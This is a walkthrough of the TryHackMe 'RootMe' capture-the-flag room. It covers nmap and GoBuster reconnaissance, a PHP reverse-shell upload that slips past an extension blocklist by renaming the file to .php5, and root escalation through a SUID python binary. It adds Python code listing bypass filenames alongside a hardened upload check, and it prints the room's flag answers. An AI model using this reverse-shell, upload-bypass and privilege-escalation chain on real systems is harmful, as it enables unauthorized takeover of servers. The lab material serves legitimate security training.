RootMe - TryHackMe Challenge Walkthrough
Site Link: https://tryhackme.com/r/room/rrootme
Task 1 Deploy the machine
Connect to the TryHackMe network and deploy the machine. If you don't know how to do this, complete the OpenVPN room first.
Answer the questions below
Deploy the machine
Task 2 Reconnaissance
First, let’s get information about the target.
1. Open a web browser and navigate to the target IP address
http://<TARGET MACHINE_IP>
2. Inspect the page source
Ctrl + U
Nothing useful was found in the source.
3. Scan the target with Nmap to gather information about its services.
nmap -sV -T4 <TARGET MACHINE_IP>
-sV: Probes the open ports to identify the service and, where possible, the software version running on each.
-T4: Sets the timing template to 4 (aggressive), which speeds up the scan at the cost of being noisier on the network.
Open ports:
Port 22/tcp (SSH): open, OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux).
Port 80/tcp (HTTP): open, Apache httpd 2.4.29 (Ubuntu).
Closed ports:
The remaining 998 of the 1000 default TCP ports scanned are closed (connection refused).
Operating system: Linux (Ubuntu, from the service banners).
Answer the questions below
2.1 Scan the machine, how many ports are open?
Answer: 2
2.2 What version of Apache is running?
Answer: 2.4.29
2.3 What service is running on port 22?
Answer: ssh
4. Find directories on the web server using the GoBuster tool
GoBuster brute-forces file and directory names on a web server from a wordlist. It finds content that is not linked from any page, which is how hidden admin areas, upload handlers and leftover files get exposed, so it is a standard step in a web security test.
gobuster dir -u http://<TARGET MACHINE_IP> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
gobuster dir: Runs GoBuster in directory/file brute-forcing mode.
-u http://<TARGET MACHINE_IP>: The target URL to enumerate.
-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt: The wordlist GoBuster will try.
The GoBuster results include directories like /uploads/, /css/ and /js/, which are common on many websites and usually hold stylesheets, JavaScript or user-uploaded content. Note /uploads/ in particular: if the site accepts file uploads, this is the likely place they are stored, and we will need it later.
The /panel/ directory stands out: it looks like an administrative area and is worth exploring further. If it is not properly secured, it may give access to sensitive functions.
Answer the questions below
2.5 What is the hidden directory?
ANSWER: /panel/
5. Next steps: investigate the /panel/ directory
Open it in a web browser:
http://<TARGET MACHINE_IP>/panel/
The page presents a file upload form, which is what we will use in the next task.
Task 3 Getting a shell
Find a form to upload and get a reverse shell, and find the flag.
Answer the questions below
user.txt (Question Hint Search for “file upload bypass” and “PHP reverse shell”.)
1. Clone the php-reverse-shell repository from GitHub (PentestMonkey's PHP reverse shell)
git clone https://github.com/pentestmonkey/php-reverse-shell
2. List the contents
ls
3. Change into the directory
cd php-reverse-shell
4. List the contents
ls
5. Open php-reverse-shell.php in a text editor
nano php-reverse-shell.php
Look for the following section of the script and set the $ip and $port variables to your attacking machine's VPN IP and the port your listener will use:
// CHANGE THIS
$ip = 'YOUR_IP'; // your attacking machine's IP address (the tun0 address on the TryHackMe VPN)
$port = YOUR_PORT; // the port your Netcat listener will be waiting on
Save and exit:
CTRL + O, then Enter, to save; CTRL + X to exit
6. On the /panel/ page, select php-reverse-shell.php and click Upload.
The upload fails with an error message saying PHP files are not allowed. The upload handler is rejecting the file based on its extension, which is a weak control: it only tells us the .php extension is blocklisted, not that PHP can never be executed from the uploads directory.
7. Search for "file upload bypass" and "PHP reverse shell".
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
A common bypass for an extension blocklist is to rename the payload to an alternative extension that the filter does not block but that the web server still passes to the PHP interpreter, such as .php5. Make a copy with that extension and check it exists:
cp php-reverse-shell.php php-reverse-shell.php5
ls
Upload php-reverse-shell.php5 through the same form. This time the file is accepted and uploaded successfully.
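The bypass above works because the upload handler checks only the literal .php suffix. The block below is an added example (my own code, not the room's upload handler, whose source is not shown on the page) that models that weak check next to a hardened one, and generates the candidate filenames a tester would try against such a filter. The PHP_PAYLOAD and PNG_HEADER bytes are constructed samples; the list of alternative PHP extensions is an assumption about which ones a given Apache/mod_php configuration maps to the interpreter, so verify each against the target.

```python
import secrets

# Constructed samples: the start of a PHP reverse shell and of a real PNG file.
PHP_PAYLOAD = b"<?php\nset_time_limit (0);\n$ip = '10.10.10.10';\n$port = 4444;\n"
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32

# Extensions that Apache's mod_php may hand to the interpreter. Assumption:
# which of these actually execute depends on the server's FilesMatch/AddType
# configuration; on this room .php5 did.
PHP_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar")

# Allowlist used by the hardened check: extension -> expected magic bytes.
ALLOWED_IMAGES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def bypass_candidates(filename):
    """Tester's view: the alternative names to try when '.php' is rejected.

    Produces the same basename with each alternative PHP extension, plus the
    double-extension form (shell.php.png) that fools filters which only look
    at the final suffix.
    """
    base = filename.rsplit(".", 1)[0]
    names = [base + ext for ext in PHP_EXTENSIONS if ext != ".php"]
    names += [base + ".php.png", base + ".php5.png"]
    return names


def weak_upload_check(filename):
    """Model of the room's filter: a blocklist on the literal '.php' suffix.

    'php-reverse-shell.php5' and 'shell.phtml' both pass this check.
    """
    return not filename.lower().endswith(".php")


def hardened_upload_check(filename, data):
    """Allowlist on extension, verify the magic bytes, and let the server pick
    the stored name. Returns (accepted, stored_name_or_reason).

    Every dotted component is inspected, not only the last one, so
    'shell.php.png' is rejected even though it ends in an allowed extension.
    """
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return (False, "no extension")
    for part in parts[1:]:
        if "." + part in PHP_EXTENSIONS:
            return (False, "php extension in name")
    ext = "." + parts[-1]
    magic = ALLOWED_IMAGES.get(ext)
    if magic is None:
        return (False, "extension not on allowlist")
    if not data.startswith(magic):
        return (False, "content does not match extension")
    # The client never controls the stored basename, so even a polyglot image
    # carrying PHP inside it cannot be reached under an executable extension.
    stored = secrets.token_hex(8) + ext
    return (True, stored)


if __name__ == "__main__":
    print("candidates:", bypass_candidates("php-reverse-shell.php"))
    print("weak accepts .php5:", weak_upload_check("php-reverse-shell.php5"))
    print("hardened on .php5:", hardened_upload_check("php-reverse-shell.php5", PHP_PAYLOAD))
    print("hardened on photo.png:", hardened_upload_check("photo.png", PNG_HEADER))
```

Even the hardened check should be paired with a server-side rule that disables PHP execution in the uploads directory (for Apache with mod_php, `php_admin_flag engine off` in a `<Directory>` block for /uploads), so a filter mistake does not become remote code execution.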
8. Set up a listener on your attacking machine using Netcat, on the same port you put in $port
nc -lvnp <LISTENING_PORT>
9. Navigate to the uploaded file's URL so the server executes the PHP code.
Browse to the uploads directory found earlier with GoBuster:
http://<TARGET MACHINE_IP>/uploads/
Click on php-reverse-shell.php5. The server runs it as PHP and the script connects back to the listener.
We now have a limited reverse shell.
Upgrade the shell to an interactive TTY
python -c 'import pty; pty.spawn("/bin/bash")'
Use find to locate user.txt
find / -type f -name user.txt 2>/dev/null
The user.txt file is at /var/www/user.txt
Now we can display its content
cat /var/www/user.txt
We found the flag.
3.1 Answer: THM{y0u_g0t_a_sh3ll}
Task 4 Privilege escalation
Now that we have a shell, let’s escalate our privileges to root.
Answer the questions below
4.1 Search for files with SUID permission, which file is weird?
Find a form to escalate your privileges.
root.txt
1. Start by finding SUID files owned by root
find / -type f -user root -perm -4000 2>/dev/null
-perm -4000 matches files with the setuid bit; any such binary owned by root runs with an effective UID of 0 regardless of who executes it, so one that is not a normal system binary is a prime escalation candidate.
4.1 Search for files with SUID permission, which file is weird?
Answer: /usr/bin/python
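The question "which file is weird?" is answered by comparing the SUID list against what a clean install of the same release ships with. The block below is an added example, my own code rather than anything from the room, that reproduces the find command above in Python and diffs the result against a baseline. The EXPECTED_SUID set is an assumed, trimmed approximation of a stock Ubuntu 18.04 list and should be regenerated from a clean host of the same release before relying on it; demo_on_tempdir() builds a throwaway setuid file so the walker can be exercised without root.

```python
import os
import stat
import tempfile

# Assumption: approximate set of SUID-root binaries on a stock Ubuntu 18.04
# install. Regenerate this from a clean machine of the same release in practice.
EXPECTED_SUID = frozenset({
    "/bin/fusermount", "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/at", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd",
    "/usr/bin/newgidmap", "/usr/bin/newgrp", "/usr/bin/newuidmap",
    "/usr/bin/passwd", "/usr/bin/pkexec", "/usr/bin/sudo",
    "/usr/bin/traceroute6.iputils",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/snapd/snap-confine",
})


def find_suid(root="/", owner_uid=0):
    """Equivalent of `find ROOT -type f -user UID -perm -4000`.

    Walks the tree without following symlinks and returns regular files owned
    by owner_uid that carry the setuid bit. Unreadable directories are skipped
    rather than aborting the scan, like the 2>/dev/null in the shell version.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink to a setuid file is not itself setuid
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_uid == owner_uid and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def weird_suid(paths, baseline=EXPECTED_SUID):
    """Return the SUID binaries that a stock system should not have."""
    return [p for p in paths if p not in baseline]


def demo_on_tempdir():
    """Create a temporary directory with one setuid file (owned by the current
    user, so no root needed) and run the scan against it. Returns a dict with
    the created path, what find_suid found, and what weird_suid flagged."""
    tmp = tempfile.mkdtemp(prefix="suid-demo-")
    target = os.path.join(tmp, "python")   # constructed: mimics the room's odd binary
    plain = os.path.join(tmp, "readme.txt")
    for p in (target, plain):
        with open(p, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
    os.chmod(target, 0o4755)  # rwsr-xr-x
    os.chmod(plain, 0o644)
    found = find_suid(tmp, owner_uid=os.getuid())
    return {"target": target, "found": found, "weird": weird_suid(found)}


if __name__ == "__main__":
    result = demo_on_tempdir()
    print("setuid files:", result["found"])
    print("not in baseline:", result["weird"])
    # On the room's box this prints ['/usr/bin/python'] among the findings.
    print(weird_suid(["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/python"]))
```

Run against a real target, call find_suid() with the defaults (root="/", owner_uid=0) from the upgraded shell; anything weird_suid() reports is what to look up on GTFOBins next.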
2. Now that we have the list of SUID binaries, check GTFOBins to see whether any of them can be abused for privilege escalation
https://gtfobins.github.io/
Search for python and use the SUID entry:
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
The -p flag puts sh in privileged mode so it keeps the effective UID granted by the setuid bit instead of dropping back to our real UID. The privilege escalation is successful and we have a root shell.
3. Change to the /root directory, list its contents, and cat root.txt
The last flag:
4.3 Answer: THM{pr1v1l3g3_3sc4l4t10n}